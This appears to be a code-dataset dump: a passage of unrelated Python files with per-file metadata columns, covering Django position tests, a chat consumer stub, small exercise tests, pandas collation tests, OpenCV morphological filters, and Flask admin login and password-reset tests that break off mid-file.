tools.assert_false(Position.objects.get_active_position(self.category, 'position-name'))
def test_more_positions_one_active(self):
n = now()
p1 = Position.objects.create(category=self.category, name='position-name', text='some text',
active_from=n-timedelta(days=1),
)
p2 = Position.objects.create(category=self.category, name='position-name', text='some text', active_till=n-timedelta(days=1))
tools.assert_equals(p1, Position.objects.get_active_position(self.category_nested, 'position-name'))
def test_not_disabled(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text', disabled=False)
tools.assert_equals(p, Position.objects.get_active_position(self.category, 'position-name'))
def test_disabled(self):
p = Position.objects.create(category=self.category, name='position-name', text='some text', disabled=True)
tools.assert_false(Position.objects.get_active_position(self.category, 'position-name'))
def test_position_with_broken_definition_dont_raise_big_500(self):
p = Position.objects.create(category=self.category, name='position-name', text='{% load nonexistent_tags %}', disabled=False)
tools.assert_equals('', p.render(Context({}), NodeList(), ''))
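# The overlap rule the validation tests above pin down can be written as a
# standalone predicate (a sketch under that reading, not the ella source):
# two positions with the same category and name conflict when their
# [active_from, active_till) windows intersect, with None meaning unbounded.
#
#     from datetime import datetime
#
#     def windows_overlap(a_from, a_till, b_from, b_till):
#         neg, pos = datetime.min, datetime.max  # stand-ins for open ends
#         a0, a1 = a_from or neg, a_till or pos
#         b0, b1 = b_from or neg, b_till or pos
#         return a0 < b1 and b0 < a1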
| 58.416667
| 157
| 0.733109
| 1,011
| 7,711
| 5.383778
| 0.115727
| 0.092596
| 0.102884
| 0.123461
| 0.833364
| 0.825648
| 0.806724
| 0.772552
| 0.75271
| 0.729745
| 0
| 0.014008
| 0.139022
| 7,711
| 131
| 158
| 58.862595
| 0.805844
| 0.002723
| 0
| 0.292929
| 0
| 0
| 0.107975
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 1
| 0.242424
| false
| 0.010101
| 0.10101
| 0
| 0.353535
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2e8157d0057883a9f254fc0a474914098a9d53ef
| 125
|
py
|
Python
|
game/consumers/chat_consumer.py
|
smrsan/django-backgammon-server
|
02eee8fea2c4aa0e40b333a35b0bb09d7b444230
|
[
"MIT"
] | null | null | null |
game/consumers/chat_consumer.py
|
smrsan/django-backgammon-server
|
02eee8fea2c4aa0e40b333a35b0bb09d7b444230
|
[
"MIT"
] | 6
|
2021-03-18T22:43:08.000Z
|
2021-09-22T18:31:02.000Z
|
game/consumers/chat_consumer.py
|
smrsan/django-backgammon-server
|
02eee8fea2c4aa0e40b333a35b0bb09d7b444230
|
[
"MIT"
] | null | null | null |
from channels.generic.websocket import AsyncJsonWebsocketConsumer
class ChatConsumer(AsyncJsonWebsocketConsumer):
pass
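# The consumer above is a stub. A minimal echo implementation using the
# standard AsyncJsonWebsocketConsumer hooks might look like this (a sketch,
# not the project's intended behavior):
class EchoChatConsumer(AsyncJsonWebsocketConsumer):
    async def connect(self):
        await self.accept()  # accept every websocket handshake

    async def receive_json(self, content, **kwargs):
        await self.send_json(content)  # echo the JSON payload back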
| 20.833333
| 65
| 0.856
| 10
| 125
| 10.7
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104
| 125
| 5
| 66
| 25
| 0.955357
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
cf217ec2c668980f77926956ee45dbdf480f78c0
| 245
|
py
|
Python
|
takeaway/settings/flask/models.py
|
ShahinZeynalov/startapp
|
3470666114dad3563393ea976cac8daa03611c41
|
[
"MIT"
] | 1
|
2020-06-08T06:54:08.000Z
|
2020-06-08T06:54:08.000Z
|
takeaway/settings/flask/models.py
|
ShahinZeynalov/startapp
|
3470666114dad3563393ea976cac8daa03611c41
|
[
"MIT"
] | null | null | null |
takeaway/settings/flask/models.py
|
ShahinZeynalov/startapp
|
3470666114dad3563393ea976cac8daa03611c41
|
[
"MIT"
] | null | null | null |
flask_model = '''
from extensions.extension import Model,String,Integer,Column,DateTime,ForeignKey,relationship
from extensions.extension import db
from sqlalchemy.sql import func
from sqlalchemy.exc import InvalidRequestError,IntegrityError
'''
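# A minimal sketch of how a scaffolding tool might materialize this template
# (write_flask_model is a hypothetical helper, not part of the original file):
def write_flask_model(path="models.py"):
    with open(path, "w") as fh:
        fh.write(flask_model)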
| 35
| 93
| 0.84898
| 29
| 245
| 7.137931
| 0.655172
| 0.135266
| 0.222222
| 0.280193
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077551
| 245
| 7
| 94
| 35
| 0.915929
| 0
| 0
| 0
| 0
| 0
| 0.918699
| 0.382114
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cf304937e634e8422f1ac726bca949c7cbc5ede0
| 960
|
py
|
Python
|
week_5_Jun_17/caught_speeding/test_ron_solution.py
|
FunWithPythonProgramming/coding-bat-exercises
|
0383fb5ebbea2befac21791e3cfc8a393abf9b4a
|
[
"MIT"
] | null | null | null |
week_5_Jun_17/caught_speeding/test_ron_solution.py
|
FunWithPythonProgramming/coding-bat-exercises
|
0383fb5ebbea2befac21791e3cfc8a393abf9b4a
|
[
"MIT"
] | 8
|
2020-02-18T03:18:09.000Z
|
2022-01-13T02:53:27.000Z
|
week_5_Jun_17/caught_speeding/test_ron_solution.py
|
FunWithPythonProgramming/coding-bat-exercises
|
0383fb5ebbea2befac21791e3cfc8a393abf9b4a
|
[
"MIT"
] | null | null | null |
from ron_solution import caught_speeding
def test_caught_speed_60_false():
assert(caught_speeding(60, False)) == 0
def test_caught_speed_65_false():
assert(caught_speeding(65, False)) == 1
def test_caught_speed_65_true():
assert(caught_speeding(65, True)) == 0
def test_caught_speed_80_false():
assert(caught_speeding(80, False)) == 1
def test_caught_speed_85_false():
assert(caught_speeding(85, False)) == 2
def test_caught_speed_85_true():
assert(caught_speeding(85, True)) == 1
def test_caught_speed_70_false():
assert(caught_speeding(70, False)) == 1
def test_caught_speed_75_false():
assert(caught_speeding(75, False)) == 1
def test_caught_speed_75_true():
assert(caught_speeding(75, True)) == 1
def test_caught_speed_40_false():
assert(caught_speeding(40, False)) == 0
def test_caught_speed_40_true():
assert(caught_speeding(40, True)) == 0
def test_caught_speed_90_false():
assert(caught_speeding(90, False)) == 2
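# For reference, an implementation consistent with every expectation above
# (a sketch; the actual ron_solution.py is not shown here):
def caught_speeding_reference(speed, is_birthday):
    limit = 65 if is_birthday else 60  # a birthday shifts both thresholds up by 5
    if speed <= limit:
        return 0  # no ticket
    if speed <= limit + 20:
        return 1  # small ticket
    return 2  # big ticket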
| 25.263158
| 42
| 0.755208
| 150
| 960
| 4.42
| 0.153333
| 0.27451
| 0.235294
| 0.325792
| 0.40724
| 0.361991
| 0.078431
| 0
| 0
| 0
| 0
| 0.071006
| 0.119792
| 960
| 37
| 43
| 25.945946
| 0.713609
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.48
| 1
| 0.48
| true
| 0
| 0.04
| 0
| 0.52
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
cf52e48cbd90ac9d187fd359c788718b02d2e85b
| 73
|
py
|
Python
|
my_math.py
|
ppwadhwa/git-tutorial
|
713f500d513565e58c8af04cad3a7017401f8842
|
[
"MIT"
] | null | null | null |
my_math.py
|
ppwadhwa/git-tutorial
|
713f500d513565e58c8af04cad3a7017401f8842
|
[
"MIT"
] | null | null | null |
my_math.py
|
ppwadhwa/git-tutorial
|
713f500d513565e58c8af04cad3a7017401f8842
|
[
"MIT"
] | null | null | null |
def my_add(a, b):
return a + 2*b
def my_mult(a, b):
return a*b*2
| 14.6
| 18
| 0.561644
| 18
| 73
| 2.166667
| 0.444444
| 0.153846
| 0.410256
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.037736
| 0.273973
| 73
| 5
| 19
| 14.6
| 0.698113
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d8566a7ec94ec69ba4bea4aa46cf7ed98b1c1d66
| 2,535
|
py
|
Python
|
tests/unit/nodes/filters/test_collate.py
|
brendanhasz/drainpype
|
a183acec7cae1ef9fde260868e2b021516a8cd7f
|
[
"MIT"
] | 2
|
2021-03-03T12:11:24.000Z
|
2021-03-18T15:09:52.000Z
|
tests/unit/nodes/filters/test_collate.py
|
brendanhasz/pipedown
|
a183acec7cae1ef9fde260868e2b021516a8cd7f
|
[
"MIT"
] | null | null | null |
tests/unit/nodes/filters/test_collate.py
|
brendanhasz/pipedown
|
a183acec7cae1ef9fde260868e2b021516a8cd7f
|
[
"MIT"
] | null | null | null |
import pandas as pd
from pipedown.nodes.filters.collate import Collate
from pipedown.utils.empty import EMPTY
def test_collate():
df = pd.DataFrame()
df["a"] = [1, 2, 3, 4]
df["b"] = ["a", "b", "c", "d"]
df["c"] = [5.0, 6.0, 7.0, 8.0]
collate = Collate()
xo, yo = collate.run(
(df[["a", "b"]].iloc[[1, 3]], df["c"].iloc[[1, 3]]),
(df[["a", "b"]].iloc[[0, 2]], df["c"].iloc[[0, 2]]),
)
assert isinstance(xo, pd.DataFrame)
assert xo.shape[0] == 4
assert xo.shape[1] == 2
assert xo.iloc[0, 0] == 1
assert xo.iloc[1, 0] == 2
assert xo.iloc[2, 0] == 3
assert xo.iloc[3, 0] == 4
assert xo.iloc[0, 1] == "a"
assert xo.iloc[1, 1] == "b"
assert xo.iloc[2, 1] == "c"
assert xo.iloc[3, 1] == "d"
assert isinstance(yo, pd.Series)
assert yo.shape[0] == 4
assert yo.iloc[0] == 5.0
assert yo.iloc[1] == 6.0
assert yo.iloc[2] == 7.0
assert yo.iloc[3] == 8.0
def test_collate_with_empty():
df = pd.DataFrame()
df["a"] = [1, 2, 3, 4]
df["b"] = ["a", "b", "c", "d"]
df["c"] = [5.0, 6.0, 7.0, 8.0]
collate = Collate()
xo, yo = collate.run(
EMPTY,
(df[["a", "b"]].iloc[[1, 3]], df["c"].iloc[[1, 3]]),
EMPTY,
(df[["a", "b"]].iloc[[0, 2]], df["c"].iloc[[0, 2]]),
EMPTY,
)
assert isinstance(xo, pd.DataFrame)
assert xo.shape[0] == 4
assert xo.shape[1] == 2
assert xo.iloc[0, 0] == 1
assert xo.iloc[1, 0] == 2
assert xo.iloc[2, 0] == 3
assert xo.iloc[3, 0] == 4
assert xo.iloc[0, 1] == "a"
assert xo.iloc[1, 1] == "b"
assert xo.iloc[2, 1] == "c"
assert xo.iloc[3, 1] == "d"
assert isinstance(yo, pd.Series)
assert yo.shape[0] == 4
assert yo.iloc[0] == 5.0
assert yo.iloc[1] == 6.0
assert yo.iloc[2] == 7.0
assert yo.iloc[3] == 8.0
def test_collate_with_y_none():
df = pd.DataFrame()
df["a"] = [1, 2, 3, 4]
df["b"] = ["a", "b", "c", "d"]
df["c"] = [5.0, 6.0, 7.0, 8.0]
collate = Collate()
xo, yo = collate.run(
(df[["a", "b"]].iloc[[1, 3]], None),
(df[["a", "b"]].iloc[[0, 2]], None),
)
assert isinstance(xo, pd.DataFrame)
assert xo.shape[0] == 4
assert xo.shape[1] == 2
assert xo.iloc[0, 0] == 1
assert xo.iloc[1, 0] == 2
assert xo.iloc[2, 0] == 3
assert xo.iloc[3, 0] == 4
assert xo.iloc[0, 1] == "a"
assert xo.iloc[1, 1] == "b"
assert xo.iloc[2, 1] == "c"
assert xo.iloc[3, 1] == "d"
assert yo is None
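# From the assertions above, Collate.run evidently drops EMPTY inputs and
# concatenates the remaining (X, y) pairs back into index order. A sketch of
# that behavior (an assumption for illustration, not the pipedown source):
def collate_reference(*outputs):
    pairs = [o for o in outputs if o is not EMPTY]
    xs, ys = zip(*pairs)
    x = pd.concat(xs).sort_index()
    y = None if ys[0] is None else pd.concat(ys).sort_index()
    return x, y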
| 25.606061
| 60
| 0.485602
| 446
| 2,535
| 2.742152
| 0.089686
| 0.196239
| 0.235487
| 0.039248
| 0.887163
| 0.878986
| 0.870809
| 0.870809
| 0.870809
| 0.870809
| 0
| 0.084783
| 0.274162
| 2,535
| 98
| 61
| 25.867347
| 0.579891
| 0
| 0
| 0.853659
| 0
| 0
| 0.019329
| 0
| 0
| 0
| 0
| 0
| 0.560976
| 1
| 0.036585
| false
| 0
| 0.036585
| 0
| 0.073171
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d894c4a1bdfa0f077ce256dd203cb0930613965c
| 3,505
|
py
|
Python
|
ovl/morphological_functions/morphological_functions.py
|
frc1937/ovl
|
1954edf0ab946dbb42d90eba1dac97eeb157c567
|
[
"Apache-2.0"
] | 1
|
2021-05-13T12:15:29.000Z
|
2021-05-13T12:15:29.000Z
|
ovl/morphological_functions/morphological_functions.py
|
frc1937/ovl
|
1954edf0ab946dbb42d90eba1dac97eeb157c567
|
[
"Apache-2.0"
] | null | null | null |
ovl/morphological_functions/morphological_functions.py
|
frc1937/ovl
|
1954edf0ab946dbb42d90eba1dac97eeb157c567
|
[
"Apache-2.0"
] | null | null | null |
import cv2
from ..image_filters import kernels
from ..image_filters.image_filter import image_filter
from ..utils.remove_none_values import remove_none_values
@image_filter
def erosion(mask, kernel=(5, 5), iterations=1, destination=None,
anchor=None, border_type=None, border_value=None):
"""
a copy of cv2.erode with default kernel of 5 by 5
(a logical operation on the binary mask,
whether every pixel's value should stay as it is based on neighboring pixels,
which neighbors are chosen by the kernel and its dimensions)
Erode demands all chosen neighbors must be True (white)
For more information:
https://docs.opencv.org/3.0-beta/doc/py_tutorials/py_imgproc/py_morphological_ops/py_morphological_ops.html
:param mask: the binary image where the erosion morphological function should be applied
:param kernel: the kernel that should be used
:param iterations: Number of times the function should be applied
:param destination: where the new image should be saved
:param anchor: position of the anchor within the element
:param border_value: border value in case of a constant border
:param border_type: Pixel extrapolation technique for the border of the image
see: https://docs.opencv.org/3.4.2/d2/de8/group__core__array.html#ga209f2f4869e304c82d07739337eae7c5
:return: the eroded binary mask
"""
if isinstance(kernel, tuple):
kernel = kernels.rectangle_kernel(kernel)
arguments = {
"iterations": iterations,
"dst": destination,
"anchor": anchor,
"borderType": border_type,
"borderValue": border_value
}
return cv2.erode(mask,
kernel,
**remove_none_values(arguments))
@image_filter
def dilation(mask, kernel=(5, 5), iterations=1, destination=None,
anchor=None, border_type=None, border_value=None):
"""
a copy of cv2.dilate with default kernel of 5 by 5
(a logical operation on the binary mask,
whether every pixel's value should stay as it is based on neighboring pixels,
which neighbors are chosen by the kernel and its dimensions)
Dilation demands at least one chosen neighbors must be True (white)
For more information:
https://docs.opencv.org/3.0-beta/doc/py_tutorials/py_imgproc/py_morphological_ops/py_morphological_ops.html
:param mask: the binary image where the dilation morphological function should be applied
:param kernel: the kernel that should be used
:param iterations: Number of times the function should be applied
:param destination: where the new image should be saved
:param anchor: position of the anchor within the element
:param border_value: border value in case of a constant border
:param border_type: the technique used to determine pixels that fall outside
the image boundary when the kernel is applied (e.g. mirror or copy)
See: https://docs.opencv.org/3.4.2/d2/de8/group__core__array.html#ga209f2f4869e304c82d07739337eae7c5
:return: the dilated binary mask
"""
if isinstance(kernel, tuple):
kernel = kernels.rectangle_kernel(kernel)
arguments = {
"iterations": iterations,
"dst": destination,
"anchor": anchor,
"borderType": border_type,
"borderValue": border_value
}
return cv2.dilate(mask,
kernel,
**remove_none_values(arguments))
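# For comparison, the direct OpenCV equivalent of the defaults above
# (a sketch assuming a binary uint8 mask and the 5x5 rectangular kernel):
#
#     import numpy as np
#     kernel = np.ones((5, 5), np.uint8)
#     eroded = cv2.erode(mask, kernel, iterations=1)
#     dilated = cv2.dilate(mask, kernel, iterations=1)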
| 44.367089
| 111
| 0.707275
| 476
| 3,505
| 5.107143
| 0.266807
| 0.036199
| 0.026327
| 0.029617
| 0.819416
| 0.819416
| 0.790621
| 0.790621
| 0.790621
| 0.790621
| 0
| 0.026809
| 0.22311
| 3,505
| 78
| 112
| 44.935897
| 0.865957
| 0.608845
| 0
| 0.705882
| 0
| 0
| 0.065844
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.117647
| 0
| 0.235294
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
99667c1295a6032e7bfb9ac288167df68846d31f
| 197,927
|
py
|
Python
|
opac/tests/test_admin_views.py
|
jamilatta/opac
|
380da89a5ceb84f843a65c36455404fcb8dc1173
|
[
"BSD-2-Clause"
] | null | null | null |
opac/tests/test_admin_views.py
|
jamilatta/opac
|
380da89a5ceb84f843a65c36455404fcb8dc1173
|
[
"BSD-2-Clause"
] | null | null | null |
opac/tests/test_admin_views.py
|
jamilatta/opac
|
380da89a5ceb84f843a65c36455404fcb8dc1173
|
[
"BSD-2-Clause"
] | null | null | null |
# coding: utf-8
import unittest
import re
from flask import current_app, url_for, g
from flask_login import current_user
from webapp import dbsql, mail
from webapp.utils import create_user
from webapp.admin import forms
from webapp.controllers import get_user_by_email
from webapp.notifications import send_confirmation_email
from .base import BaseTestCase
from tests.utils import (
makeOneJournal,
makeOneIssue,
makeOneArticle,
makeOneCollection, makeOneSponsor
)
reset_pwd_url_pattern = re.compile('href="(.*)">')
email_confirm_url_pattern = re.compile('href="(.*)">')
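# note: the greedy '(.*)' in these patterns can span up to the last '">' on a
# line; a non-greedy 'href="(.*?)">' would capture each href individually
# (the emails under test contain a single link, so the greedy form suffices)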
class AdminViewsTestCase(BaseTestCase):
def test_unauthorized_access_to_admin_index_must_redirect(self):
"""
When:
we access the admin/index page without having logged in.
We check:
that a redirect to admin/login is performed
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
admin_index_url = url_for('admin.index')
expected_login_url = url_for('admin.login_view')
# when
response = c.get(admin_index_url, follow_redirects=False)
# then
self.assertStatus(response, 302)
self.assertEqual('text/html; charset=utf-8', response.content_type)
self.assertRedirects(response, expected_login_url)
def test_access_to_admin_index_must_redirect_to_login_form(self):
"""
When:
we access the admin/index page without having logged in (following redirects).
We check:
that we end up at the admin/login form
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
admin_index_url = url_for('admin.index')
# when
response = c.get(admin_index_url, follow_redirects=True)
# then
self.assertStatus(response, 200)
self.assertEqual('text/html; charset=utf-8', response.content_type)
self.assertTemplateUsed('admin/auth/login.html')
def test_invalid_credentials_login_must_show_validation_error(self):
"""
With:
valid login data for a user that does *NOT* exist.
When:
we try to log in with that data.
We check:
- the page shown corresponds to the login page.
- the page shown contains a message indicating: invalid user.
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
login_url = url_for('admin.login_view')
login_credentials = {
'email': 'foo@example.com',
'password': '123'
}
expected_errors_msg = {
'password': u'<span class="help-block">Usuário inválido</span>',
}
# when
response = c.post(login_url, data=login_credentials)
# then
self.assertStatus(response, 200)
self.assertTemplateUsed('admin/auth/login.html')
self.assertIn(expected_errors_msg['password'], response.data.decode('utf-8'))
def test_invalid_user_login_must_show_validation_error(self):
"""
With:
login data: invalid email, valid password.
When:
we try to log in with that data.
We check:
- the page shown corresponds to the login page.
- the page shown contains messages indicating:
invalid email and invalid user.
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
login_url = url_for('admin.login_view')
login_credentials = {
'email': 'foo',  # invalid email
'password': '123'
}
expected_errors_msg = {
'email': u'<span class="help-block">Invalid email address.</span>',
'password': u'<span class="help-block">Usuário inválido</span>',
}
# when
response = c.post(login_url, data=login_credentials)
# then
self.assertStatus(response, 200)
self.assertTemplateUsed('admin/auth/login.html')
self.assertIn(expected_errors_msg['email'], response.data.decode('utf-8'))
self.assertIn(expected_errors_msg['password'], response.data.decode('utf-8'))
def test_invalid_password_login_must_show_validation_error(self):
"""
With:
login data: valid email, invalid password.
When:
we try to log in with that data.
We check:
- the page shown corresponds to the login page.
- the page shown contains a message indicating the password is required.
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
login_url = url_for('admin.login_view')
login_credentials = {
'email': 'foo@example.com',
'password': '',  # invalid password
}
expected_errors_msg = {
'password': u'<span class="help-block">This field is required.</span>',
}
# when
response = c.post(login_url, data=login_credentials)
# then
self.assertStatus(response, 200)
self.assertTemplateUsed('admin/auth/login.html')
self.assertIn(expected_errors_msg['password'], response.data.decode('utf-8'))
def test_login_successfully(self):
"""
With:
a new user (with a confirmed email)
When:
the new user logs in
We check:
- the page shown corresponds to admin/index
- the page shown contains a link to log out.
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
login_url = url_for('admin.login_view')
credentials = {
'email': 'foo@example.com',
'password': '123',
}
expected_page_header = u'<h1>OPAC Admin <small>da coleção: %s</small></h1>' % \
current_app.config['OPAC_COLLECTION'].upper()
expected_logout_url = url_for('admin.logout_view')
# when
create_user(
credentials['email'],
credentials['password'],
True)
# create new user:
response = c.post(login_url, data=credentials, follow_redirects=True)
# then
self.assertStatus(response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertIn(expected_page_header, response.data.decode('utf-8'))
self.assertIn(expected_logout_url, response.data.decode('utf-8'))
def test_login_valid_user_with_invalid_password_raise_error_msg(self):
"""
With:
a new user (with a confirmed email)
When:
the new user logs in, but with the wrong password
We check:
- the page shown remains the login page, not admin/index
- the page shown must report an invalid password
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
login_url = url_for('admin.login_view')
credentials = {
'email': 'foo@example.com',
'password': '123',
}
logged_page_header = u'<h1>OPAC Admin <small>da coleção: %s</small></h1>' % \
current_app.config['OPAC_COLLECTION'].upper()
logout_url = url_for('admin.logout_view')
# when
create_user(
credentials['email'],
credentials['password'],
True)
# create new user:
response = c.post(
login_url,
data={
'email': credentials['email'],
'password': 'foo.bar',
},
follow_redirects=True)
# then
self.assertStatus(response, 200)
self.assertTemplateUsed('admin/auth/login.html')
self.assertNotIn(logged_page_header, response.data.decode('utf-8'))
self.assertNotIn(logout_url, response.data.decode('utf-8'))
def test_login_page_must_have_link_to_password_reset(self):
"""
When:
we access the login page
We check:
the page shows the link to recover the password
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
login_url = url_for('admin.login_view')
expected_reset_pwd_link = url_for('admin.reset')
# when
response = c.get(login_url, follow_redirects=True)
# then
self.assertStatus(response, 200)
self.assertTemplateUsed('admin/auth/login.html')
self.assertIn(expected_reset_pwd_link, response.data.decode('utf-8'))
def test_login_page_must_have_set_language_links(self):
"""
With:
the list of languages supported by the app
When:
we access the login page
We check:
the page shows the links to switch languages
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
login_url = url_for('admin.login_view')
languages = current_app.config['LANGUAGES']
lang_urls = {}
for lang_code, lang_name in languages.items():
lang_urls[lang_code] = {
'url': url_for('main.set_locale', lang_code=lang_code),
'name': lang_name,
}
# when
response = c.get(login_url, follow_redirects=True)
# then
self.assertStatus(response, 200)
self.assertTemplateUsed('admin/auth/login.html')
for lang_code, lang_data in lang_urls.items():
lang_url = lang_data['url']
lang_name = lang_data['name']
self.assertIn(lang_url, response.data.decode('utf-8'))
self.assertIn(lang_name, response.data.decode('utf-8'))
@unittest.skip("Falhou na chamada: get_context_variable depois de adicionar os withs")
def test_login_with_unconfirmed_user_must_not_proceed(self):
"""
With:
a new user (with an UNCONFIRMED email)
When:
the new user logs in with the right data
We check:
- the page shown corresponds to admin/auth/unconfirm_email.html.
- the page shown must report the error.
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
login_url = url_for('admin.login_view')
credentials = {
'email': 'foo@example.com',
'password': '123',
}
expected_form_error = {'password': [u'Senha inválida']}
expected_error_msgs = [
u"Email não confirmado!",
u"Você <strong>deve</strong> confirmar seu email.<br>",
u"<strong>Por favor entre em contato com o administrador.</strong>"]
create_user(
credentials['email'],
credentials['password'],
False)
# when
# create new user:
response = c.post(
login_url,
data=credentials,
follow_redirects=True)
# then
self.assertStatus(response, 200)
self.assertTemplateUsed('admin/auth/unconfirm_email.html')
for msg in expected_error_msgs:
self.assertIn(msg, response.data.decode('utf-8'))
context_form = self.get_context_variable('form')
self.assertIsInstance(context_form, forms.LoginForm)
self.assertEqual(expected_form_error, context_form.errors)
def test_logout_successfully(self):
"""
With:
a new user (with a confirmed email).
When:
the user logs in and then logs out
We check:
the (logout) operation completes successfully
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
login_url = url_for('admin.login_view')
logout_url = url_for('admin.logout_view')
credentials = {
'email': 'foo@example.com',
'password': '123',
}
# when
create_user(credentials['email'], credentials['password'], True)
login_response = c.post(login_url, data=credentials, follow_redirects=True)
self.assertStatus(login_response, 200)
logout_response = c.get(logout_url, follow_redirects=True)
# then
self.assertStatus(logout_response, 200)
self.assertTemplateUsed('admin/auth/login.html')
def test_reset_password_has_form_as_expected(self):
"""
With:
a new user (with a confirmed email).
When:
we request password recovery.
We check:
the page loaded is the expected one, with the expected form
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
reset_pwd_url = url_for('admin.reset')
# when
response = c.get(reset_pwd_url)
# then
self.assertStatus(response, 200)
self.assertEqual('text/html; charset=utf-8', response.content_type)
self.assertTemplateUsed('admin/auth/reset.html')
context_form = self.get_context_variable('form')
self.assertIsInstance(context_form, forms.EmailForm)
def test_reset_password_of_invalid_user_raise_404(self):
"""
With:
an email of a user that does not exist in the system.
When:
we request password recovery.
We check:
a 404 page must be shown with the
user-not-found notice.
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
reset_pwd_url = url_for('admin.reset')
user_email = 'foo@example.com'
expected_errors_msg = u'<p>Usuário não encontrado</p>'
# when
response = c.post(reset_pwd_url, data={'email': user_email})
# then
self.assertStatus(response, 404)
self.assertEqual('text/html; charset=utf-8', response.content_type)
self.assertTemplateUsed('errors/404.html')
error_msg = self.get_context_variable('message')
self.assertEqual(error_msg, expected_errors_msg)
def test_reset_password_of_valid_user_proceed_ok(self):
"""
With:
a new user (with a confirmed email).
When:
we request password recovery.
We check:
the (flash) notification on the page saying the
instructions were sent to the new user's email.
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
credentials = {
'email': 'foo@bar.com',
'password': '123'
}
# with
reset_pwd_url = url_for('admin.reset')
expected_msg = u'Enviamos as instruções para recuperar a senha para: %s' % \
credentials['email']
# when
create_user(credentials['email'], credentials['password'], True)
response = c.post(
reset_pwd_url,
data={'email': credentials['email']},
follow_redirects=True)
# then
self.assertStatus(response, 200)
self.assertTemplateUsed('admin/auth/login.html')
self.assertIn(expected_msg, response.data.decode('utf-8'))
def test_reset_password_of_valid_user_email_sent(self):
"""
With:
a new user (with a confirmed email)
When:
requesting password recovery
We check:
that the message in the email that was sent contains
the link to continue the operation.
"""
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# with
reset_pwd_url = url_for('admin.reset')
credentials = {
'email': 'foo@bar.com',
'password': '123'
}
expected_email = {
'subject': u'Instruções para recuperar sua senha',
'recipients': [credentials['email'], ],
